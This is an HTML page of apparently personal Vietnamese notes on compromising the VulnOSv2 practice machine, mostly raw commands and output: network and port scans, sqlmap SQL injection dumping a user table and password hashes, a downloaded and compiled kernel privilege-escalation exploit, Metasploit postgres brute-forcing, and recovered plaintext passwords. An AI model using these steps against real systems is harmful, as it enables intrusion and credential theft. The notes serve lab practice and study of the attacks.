
    <!DOCTYPE html>
    <html lang="en">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>VulnOSv2</title>
        <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/bootstrap.min.css" rel="stylesheet">
        <link href="https://cdn.jsdelivr.net/npm/lightgallery.js/dist/css/lightgallery.min.css" rel="stylesheet">
        <link href="https://cdn.jsdelivr.net/npm/lg-thumbnail.js/dist/lg-thumbnail.min.css" rel="stylesheet">
        <!-- Add Pygments CSS for code highlighting -->
        <style>pre { line-height: 125%; }
td.linenos .normal { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }
span.linenos { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }
td.linenos .special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; }
span.linenos.special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; }
.highlight .hll { background-color: #ffffcc }
.highlight { background: #f8f8f8; }
.highlight .c { color: #3D7B7B; font-style: italic } /* Comment */
.highlight .err { border: 1px solid #FF0000 } /* Error */
.highlight .k { color: #008000; font-weight: bold } /* Keyword */
.highlight .o { color: #666666 } /* Operator */
.highlight .ch { color: #3D7B7B; font-style: italic } /* Comment.Hashbang */
.highlight .cm { color: #3D7B7B; font-style: italic } /* Comment.Multiline */
.highlight .cp { color: #9C6500 } /* Comment.Preproc */
.highlight .cpf { color: #3D7B7B; font-style: italic } /* Comment.PreprocFile */
.highlight .c1 { color: #3D7B7B; font-style: italic } /* Comment.Single */
.highlight .cs { color: #3D7B7B; font-style: italic } /* Comment.Special */
.highlight .gd { color: #A00000 } /* Generic.Deleted */
.highlight .ge { font-style: italic } /* Generic.Emph */
.highlight .gr { color: #E40000 } /* Generic.Error */
.highlight .gh { color: #000080; font-weight: bold } /* Generic.Heading */
.highlight .gi { color: #008400 } /* Generic.Inserted */
.highlight .go { color: #717171 } /* Generic.Output */
.highlight .gp { color: #000080; font-weight: bold } /* Generic.Prompt */
.highlight .gs { font-weight: bold } /* Generic.Strong */
.highlight .gu { color: #800080; font-weight: bold } /* Generic.Subheading */
.highlight .gt { color: #0044DD } /* Generic.Traceback */
.highlight .kc { color: #008000; font-weight: bold } /* Keyword.Constant */
.highlight .kd { color: #008000; font-weight: bold } /* Keyword.Declaration */
.highlight .kn { color: #008000; font-weight: bold } /* Keyword.Namespace */
.highlight .kp { color: #008000 } /* Keyword.Pseudo */
.highlight .kr { color: #008000; font-weight: bold } /* Keyword.Reserved */
.highlight .kt { color: #B00040 } /* Keyword.Type */
.highlight .m { color: #666666 } /* Literal.Number */
.highlight .s { color: #BA2121 } /* Literal.String */
.highlight .na { color: #687822 } /* Name.Attribute */
.highlight .nb { color: #008000 } /* Name.Builtin */
.highlight .nc { color: #0000FF; font-weight: bold } /* Name.Class */
.highlight .no { color: #880000 } /* Name.Constant */
.highlight .nd { color: #AA22FF } /* Name.Decorator */
.highlight .ni { color: #717171; font-weight: bold } /* Name.Entity */
.highlight .ne { color: #CB3F38; font-weight: bold } /* Name.Exception */
.highlight .nf { color: #0000FF } /* Name.Function */
.highlight .nl { color: #767600 } /* Name.Label */
.highlight .nn { color: #0000FF; font-weight: bold } /* Name.Namespace */
.highlight .nt { color: #008000; font-weight: bold } /* Name.Tag */
.highlight .nv { color: #19177C } /* Name.Variable */
.highlight .ow { color: #AA22FF; font-weight: bold } /* Operator.Word */
.highlight .w { color: #bbbbbb } /* Text.Whitespace */
.highlight .mb { color: #666666 } /* Literal.Number.Bin */
.highlight .mf { color: #666666 } /* Literal.Number.Float */
.highlight .mh { color: #666666 } /* Literal.Number.Hex */
.highlight .mi { color: #666666 } /* Literal.Number.Integer */
.highlight .mo { color: #666666 } /* Literal.Number.Oct */
.highlight .sa { color: #BA2121 } /* Literal.String.Affix */
.highlight .sb { color: #BA2121 } /* Literal.String.Backtick */
.highlight .sc { color: #BA2121 } /* Literal.String.Char */
.highlight .dl { color: #BA2121 } /* Literal.String.Delimiter */
.highlight .sd { color: #BA2121; font-style: italic } /* Literal.String.Doc */
.highlight .s2 { color: #BA2121 } /* Literal.String.Double */
.highlight .se { color: #AA5D1F; font-weight: bold } /* Literal.String.Escape */
.highlight .sh { color: #BA2121 } /* Literal.String.Heredoc */
.highlight .si { color: #A45A77; font-weight: bold } /* Literal.String.Interpol */
.highlight .sx { color: #008000 } /* Literal.String.Other */
.highlight .sr { color: #A45A77 } /* Literal.String.Regex */
.highlight .s1 { color: #BA2121 } /* Literal.String.Single */
.highlight .ss { color: #19177C } /* Literal.String.Symbol */
.highlight .bp { color: #008000 } /* Name.Builtin.Pseudo */
.highlight .fm { color: #0000FF } /* Name.Function.Magic */
.highlight .vc { color: #19177C } /* Name.Variable.Class */
.highlight .vg { color: #19177C } /* Name.Variable.Global */
.highlight .vi { color: #19177C } /* Name.Variable.Instance */
.highlight .vm { color: #19177C } /* Name.Variable.Magic */
.highlight .il { color: #666666 } /* Literal.Number.Integer.Long */</style>
        <style>
            /* Center the HTML file on the screen */
            body {
                display: flex;
                justify-content: center;
                align-items: center;
                height: 100vh;
                padding-top: 30px;
            }
            /* Make the display width of the HTML file smaller */
            .container {
                max-width: 42vw;
                margin: 0 auto;
                height: 100%
            }
            
            img {
                width: 80%;
            }
        </style>
        <script src="https://cdn.jsdelivr.net/npm/lightgallery.js/dist/js/lightgallery.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/lg-thumbnail.js/dist/lg-thumbnail.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/lg-zoom.js/dist/lg-zoom.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/lg-fullscreen.js/dist/lg-fullscreen.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/lg-share.js/dist/lg-share.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/lg-autoplay.js/dist/lg-autoplay.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/lg-rotate.js/dist/lg-rotate.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/lg-flip.js/dist/lg-flip.min.js"></script>
        <script>
            window.onload = function() {
                const images = document.getElementsByTagName('img');
                const lightGalleryItems = [];
                for (let i = 0; i < images.length; i++) {
                    const img = images[i];
                    if (img.naturalWidth > 1000) {
                        if (window.innerWidth > 768) {
                            img.style.width = '110%';
                            img.style.transform = 'translateX(-4%)';
                        } else {
                            img.style.width = '100%';
                            img.style.transform = 'none';
                        }
                    }
                    lightGalleryItems.push({ src: img.src, thumb: img.src });
                    img.setAttribute('data-lg-idx', i);
                    img.addEventListener('click', function() {
                        lightGallery(img, {
                            dynamic: true,
                            dynamicEl: lightGalleryItems,
                            index: parseInt(img.getAttribute('data-lg-idx'))
                        });
                    });
                }
            };
        </script>
    </head>
    <body>
        <div class="container">
            <div class="row">
                <div class="col">
                    <h1 style="text-align:center; text-transform:uppercase; font-family: 'Playfair Display', serif; font-weight:700;"">VulnOSv2</h1>

<p>Thursday, August 4, 2022</p>
<p>9:13 PM</p>
<p>sudo netdiscover -r 192.168.1.0/24</p>
<p>Currently scanning: Finished!   |   Screen View: Unique Hosts</p>
<p>4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240</p>
<hr />
<p>IP            At MAC Address     Count     Len  MAC Vendor / Hostname</p>
<hr />
<p>192.168.1.1     52:54:00:12:35:00      1      60  Unknown vendor</p>
<p>192.168.1.2     52:54:00:12:35:00      1      60  Unknown vendor</p>
<p>192.168.1.3     08:00:27:98:be:d4      1      60  PCS Systemtechnik GmbH</p>
<p>192.168.1.13    08:00:27:57:4f:aa      1      60  PCS Systemtechnik GmbH</p>
<p>map -A -T4 -sV -v -p- 192.168.1.13</p>
<p>PORT     STATE SERVICE VERSION</p>
<p>22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)</p>
<p>| ssh-hostkey:</p>
<p>|   1024 f5:4d:c8:e7:8b:c1:b2:11:95:24:fd:0e:4c:3c:3b:3b (DSA)</p>
<p>|   2048 ff:19:33:7a:c1:ee:b5:d0:dc:66:51:da:f0:6e:fc:48 (RSA)</p>
<p>|   256 ae:d7:6f:cc:ed:4a:82:8b:e8:66:a5:11:7a:11:5f:86 (ECDSA)</p>
<p>|_  256 71:bc:6b:7b:56:02:a4:8e:ce:1c:8e:a6:1e:3a:37:94 (ED25519)</p>
<p>80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))</p>
<p>| http-methods:</p>
<p>|_  Supported Methods: GET HEAD POST OPTIONS</p>
<p>|_http-title: VulnOSv2</p>
<p>|_http-server-header: Apache/2.4.7 (Ubuntu)</p>
<p>6667/tcp open  irc     ngircd</p>
<p>Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel</p>
<p>gobuster dir -u  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt</p>
<p>===============================================================</p>
<p>Gobuster v3.1.0</p>
<p>by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)</p>
<p>===============================================================</p>
<p>[+] Url:</p>
<p>[+] Method:                  GET</p>
<p>[+] Threads:                 10</p>
<p>[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt</p>
<p>[+] Negative Status codes:   404</p>
<p>[+] User Agent:              gobuster/3.1.0</p>
<p>[+] Timeout:                 10s</p>
<p>===============================================================</p>
<p>2022/08/03 22:40:28 Starting gobuster in directory enumeration mode</p>
<p>===============================================================</p>
<p>/javascript           (Status: 301) [Size: 316] [--&gt; ]</p>
<p>/server-status        (Status: 403) [Size: 292]</p>
<p>===============================================================</p>
<p>2022/08/03 22:41:40 Finished</p>
<p>===============================================================</p>
<p>gg khai thác opendocman, sau đó dùng searchsploit để tìm cách khai thác</p>
<p>cat /usr/share/exploitdb/exploits/php/webapps/32075.txt</p>
<p>dán payload vào browser:</p>
<p>ersion%28%29,3,4,5,6,7,8,9</p>
<p>thành:</p>
<p>Dùng sqlmap để khai thác</p>
<p>sqlmap -u "" -p add_value --dbs</p>
<p>-p: parameter</p>
<p>add_value: paramater mẫu để test</p>
<p>[22:56:02] [INFO] fetching database names</p>
<p>available databases [6]:</p>
<p>[*] drupal7</p>
<p>[*] information_schema</p>
<p>[*] jabcd0cs</p>
<p>[*] mysql</p>
<p>[*] performance_schema</p>
<p>[*] phpmyadmin</p>
<p>dump db:</p>
<p>sqlmap -u "" -p add_value -D jabcd0cs --dump</p>
<p>có thể sử dụng các option:</p>
<p>sqlmap -u "" -p add_value –threads=4 –columns -T odm_user -D jabcd0cs</p>
<p>sqlmap -u “” -p add_value –threads=4 –dump -T odm_user -D jabcd0cs</p>
<p>sqlmap -u “” –threads=4 -D jabcd0cs -T odm_user -C id,username,password –dump</p>
<p>Database: jabcd0cs</p>
<p>Table: odm_user</p>
<p>[2 entries]</p>
<p>+----+--------------------+-------------+----------------------------------+----------+-----------+------------+------------+---------------+</p>
<p>| id | Email              | phone       | password                         | username | last_name | department | first_name | pw_reset_code |</p>
<p>+----+--------------------+-------------+----------------------------------+----------+-----------+------------+------------+---------------+</p>
<p>| 1  | webmin@example.com | 5555551212  | b78aae356709f8c31118ea613980954b | webmin   | min       | 2          | web        | <blank>       |</p>
<p>| 2  | guest@example.com  | 555 5555555 | 084e0343a0486ff05530df6c705c8bb4 | guest    | guest     | 2          | guest      | NULL          |</p>
<p>+----+--------------------+-------------+----------------------------------+----------+-----------+------------+------------+---------------+</p>
<p>dùng hash-identifider để xác định loại encrypt</p>
<p>decrypt password:</p>
<p>webmin1980</p>
<p>(hash = b78aae356709f8c31118ea613980954b)</p>
<p>$ uname -a</p>
<p>Linux VulnOSv2 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:31:42 UTC 2014 i686 i686 i686 GNU/Linux</p>
<p>$ searchsploit ubuntu 3.13.0 | cut -b 1-150</p>
<p>$ wget</p>
<p>--2022-08-04 08:27:16--</p>
<p>Connecting to 192.168.1.6:80... connected.</p>
<p>HTTP request sent, awaiting response... 200 OK</p>
<p>Length: 4968 (4.9K) [text/x-csrc]</p>
<p>Saving to: ‘37292.c’</p>
<p>100%[==========================================================================&gt;] 4,968       --.-K/s   in 0.001s</p>
<p>2022-08-04 08:27:16 (4.85 MB/s) - ‘37292.c’ saved [4968/4968]</p>
<p>$ ls</p>
<p>37292.c  post.tar.gz</p>
<p>$ gcc 37292.c</p>
<p>$ ls</p>
<p>37292.c  a.out  post.tar.gz</p>
<p>$ a.out</p>
<p>-sh: 9: a.out: not found</p>
<p>$ ./a.out</p>
<p>spawning threads</p>
<p>mount #1</p>
<p>mount #2</p>
<p>child threads done</p>
<p>/etc/ld.so.preload created</p>
<p>creating shared library</p>
<h1>whoami</h1>
<p>root</p>
<p>Chiếm quyền user khác khi chưa có root</p>
<p>root@VulnOSv2:/home/webmin# tar xzvf post.tar.gz</p>
<p>root@VulnOSv2:/home/webmin# netstat -tulpn</p>
<p>Active Internet connections (only servers)</p>
<p>Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name</p>
<p>tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      1029/mysqld</p>
<p>tcp        0      0 0.0.0.0:6667            0.0.0.0:*               LISTEN      1151/ngircd</p>
<p>tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      968/sshd</p>
<p>tcp        0      0 127.0.0.1:5432          0.0.0.0:*               LISTEN      1051/postgres</p>
<p>tcp6       0      0 :::6667                 :::*                    LISTEN      1151/ngircd</p>
<p>tcp6       0      0 :::80                   :::*                    LISTEN      1239/apache2</p>
<p>tcp6       0      0 :::22                   :::*                    LISTEN      968/sshd</p>
<p>tcp6       0      0 ::1:5432                :::*                    LISTEN      1051/postgres</p>
<p>udp        0      0 0.0.0.0:68              0.0.0.0:*                           765/dhclient</p>
<p>udp        0      0 0.0.0.0:50169           0.0.0.0:*                           765/dhclient</p>
<p>udp6       0      0 :::1818                 :::*                                765/dhclient</p>
<p>Port forwarding postgres</p>
<p>ssh webmin@192.168.1.13 -L 5432:localhost:5432</p>
<p>bruteforce</p>
<p>msfconsole -q</p>
<p>msf6 &gt; use auxiliary/scanner/postgres/postgres_login</p>
<p>msf6 auxiliary(scanner/postgres/postgres_login) &gt; set RHOSTS 127.0.0.1</p>
<p>RHOSTS =&gt; 127.0.0.1</p>
<p>msf6 auxiliary(scanner/postgres/postgres_login) &gt; run</p>
<p>[!] No active DB -- Credential data will not be saved!</p>
<p>[-] 127.0.0.1:5432 - LOGIN FAILED: :@template1 (Incorrect: Invalid username or password)</p>
<p>[-] 127.0.0.1:5432 - LOGIN FAILED: :tiger@template1 (Incorrect: Invalid username or password)</p>
<p>[-] 127.0.0.1:5432 - LOGIN FAILED: :postgres@template1 (Incorrect: Invalid username or password)</p>
<p>[-] 127.0.0.1:5432 - LOGIN FAILED: :password@template1 (Incorrect: Invalid username or password)</p>
<p>[-] 127.0.0.1:5432 - LOGIN FAILED: :admin@template1 (Incorrect: Invalid username or password)</p>
<p>[-] 127.0.0.1:5432 - LOGIN FAILED: postgres:@template1 (Incorrect: Invalid username or password)</p>
<p>[-] 127.0.0.1:5432 - LOGIN FAILED: postgres:tiger@template1 (Incorrect: Invalid username or password)</p>
<p>[+] 127.0.0.1:5432 - Login Successful: postgres:postgres@template1</p>
<p>[-] 127.0.0.1:5432 - LOGIN FAILED: scott:@template1 (Incorrect: Invalid username or password)</p>
<p>[-] 127.0.0.1:5432 - LOGIN FAILED: scott:tiger@template1 (Incorrect: Invalid username or password)</p>
<p>[-] 127.0.0.1:5432 - LOGIN FAILED: scott:postgres@template1 (Incorrect: Invalid username or password)</p>
<p>[-] 127.0.0.1:5432 - LOGIN FAILED: scott:password@template1 (Incorrect: Invalid username or password)</p>
<p>[-] 127.0.0.1:5432 - LOGIN FAILED: scott:admin@template1 (Incorrect: Invalid username or password)</p>
<p>[-] 127.0.0.1:5432 - LOGIN FAILED: admin:@template1 (Incorrect: Invalid username or password)</p>
<p>[-] 127.0.0.1:5432 - LOGIN FAILED: admin:tiger@template1 (Incorrect: Invalid username or password)</p>
<p>[-] 127.0.0.1:5432 - LOGIN FAILED: admin:postgres@template1 (Incorrect: Invalid username or password)</p>
<p>[-] 127.0.0.1:5432 - LOGIN FAILED: admin:password@template1 (Incorrect: Invalid username or password)</p>
<p>[-] 127.0.0.1:5432 - LOGIN FAILED: admin:admin@template1 (Incorrect: Invalid username or password)</p>
<p>[-] 127.0.0.1:5432 - LOGIN FAILED: admin:admin@template1 (Incorrect: Invalid username or password)</p>
<p>[-] 127.0.0.1:5432 - LOGIN FAILED: admin:password@template1 (Incorrect: Invalid username or password)</p>
<p>[*] Scanned 1 of 1 hosts (100% complete)</p>
<p>[*] Auxiliary module execution completed</p>
<p>msf6 auxiliary(scanner/postgres/postgres_login) &gt;</p>
<p>dump db</p>
<p>$ PGPASSWORD="postgres" pg_dumpall -U postgres -h localhost -p 5432</p>
<p>vulnosadmin     c4nuh4ckm3tw1c3</p>
<p>thử đăng nhập ssh vào tài khoản mới</p>
<p>vulnosadmin@VulnOSv2:~$ ls</p>
<p>r00t.blend</p>
<p>vulnosadmin@VulnOSv2:~$ pwd</p>
<p>/home/vulnosadmin</p>
<p>copy file về máy</p>
<p>sudo scp vulnosadmin@192.168.1.13:/home/vulnosadmin/r00t.blend /</p>
<p>cài blender để mở file</p>
<p>apt-get install blender</p>
<p>Ta có mật khẩu root:</p>
<p>ab12fg//drg</p>
                </div>
            </div>
        </div>    
    </body>
    </html>
    <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet">
<style>

.copy-button {
  position: absolute;
  right: 5px ;
  top: 5px;
  border: transparent;
  background-color: transparent;
  padding: 2px 6px;
  cursor: pointer;
  font-size: 14px;
  color: #333;
  border-radius: 8px;

}

.copy-button:hover {
  background-color: #30363d; # Change this to a different color to create a hover effect
}
.material-icons{
  line-height:1.3;
  color: #7d8590;
}

pre {
  position: relative;
  # padding: 20px;
  border: 1px solid #e7ee7;
  overflow-x: auto; # Remove this line to disable horizontal scrolling
  font-size: 14px;
  line-height: 1.5;
  border-radius: 6px;
  margin-bottom: 20px;

  # Add these lines to set a fixed width for the code block and wrap long lines
  #width: 80%;
  white-space: pre-wrap; 
}

pre code {
  display: block;
  border-radius: 8px;
  background-color: #2d2d2d; # Change this to a different color to match the copy button background

}




@media only screen and (min-width: 280px) {
  img {
    width: 85%; /* Make image smaller on tablets and mobiles */
  }
}

@media only screen and (max-width: 768px) {
  img {
    width: 85%; /* Make image smaller on tablets and desktops */
  }
}

# @media (min-width: 576px) {
#   img {
#     max-width: 540px;
#   }
# }

# @media (min-width: 768px) {
#   img {
#     max-width: 720px;
#   }
# }



@media (min-width: 280px) {
  .container {
    max-width: 90%;
    margin: 0 auto;
    height: 100%;
  }
}

@media (min-width: 750px) {
  .container {
    max-width: 80%;
    margin: 0 auto;
    height: 100%;
  }
}



@media (min-width: 912px) {
  .container {
    max-width: 70%;
    margin: 0 auto;
    height: 100%;
  }
}

# @media (min-width: 1200px) {
#   .container {
#     max-width: 70%;
#     margin: 0 auto;
#     height: 100%;
#   }
# }

# @media (min-width: 576px) {
#   .container {
#     max-width: 540px;
#   }
# }

# @media (min-width: 768px) {
#   .container {
#     max-width: 620px;
#     margin: 0;
#   }
# }

# @media (min-width: 992px) {
#   .container {
#     max-width: 760px;
#   }
# }

@media (min-width: 1200px) {
  .container {
    max-width: 735px;
    margin: 0;
    height: 100%;
  }
}

# p { 
#   text-indent: 10px;
# }

h2 {
  font-size: 1.5rem;
}

h3 {
  font-size: 1.3rem;
}

# .container {
#   max-width: 100%; /* Set the container width to 100% */
#   padding-left: 15px; /* Add some padding to the left */
#   padding-right: 15px; /* Add some padding to the right */
# }


</style>
<script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/10.7.2/highlight.min.js"></script>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.8.0/styles/atom-one-dark-reasonable.min.css">

<script>
  document.addEventListener('DOMContentLoaded', function() {
    var codeBlocks = document.querySelectorAll('pre code');
    codeBlocks.forEach(function(codeBlock) {
      var copyButton = document.createElement('button');
      copyButton.innerHTML = '<i class="material-icons">content_copy</i>';
      copyButton.classList.add('copy-button');
      codeBlock.parentNode.insertBefore(copyButton, codeBlock);

      copyButton.addEventListener('click', function() {
        var code = codeBlock.textContent;
        var textarea = document.createElement('textarea');
        textarea.textContent = code;
        document.body.appendChild(textarea);
        textarea.select();
        document.execCommand('copy');
        textarea.remove();
        copyButton.innerHTML = '<i class="material-icons">check</i>';
        setTimeout(function() {
          copyButton.innerHTML = '<i class="material-icons">content_copy</i>';
        }, 2000);
      });
    });

    // Initialize highlight.js for syntax highlighting
    hljs.initHighlightingOnLoad();
  });
</script>
